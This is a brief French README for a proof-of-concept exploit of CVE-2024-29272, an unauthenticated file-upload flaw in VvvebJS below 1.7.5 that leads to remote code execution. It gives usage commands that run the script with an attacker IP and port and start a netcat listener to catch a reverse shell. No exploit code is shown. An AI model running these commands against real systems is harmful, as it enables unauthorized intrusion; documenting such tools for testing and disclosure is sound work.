
Exploit de preuve de concept pour CVE-2024-29272, une vulnérabilité de téléchargement de fichier arbitraire non authentifié dans VvvebJS < 1.7.5, permettant l'exécution de code à distance.
Ceci est une preuve de concept (Proof-of-Concept) pour CVE-2024-29272, une vulnérabilité de téléchargement de fichier arbitraire non authentifiée qui conduit à une exécution de code à distance sur les versions de VvvebJS < 1.7.5
utilisation:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
dans un autre terminal:
nc -lvnp <ATTACKER PORT>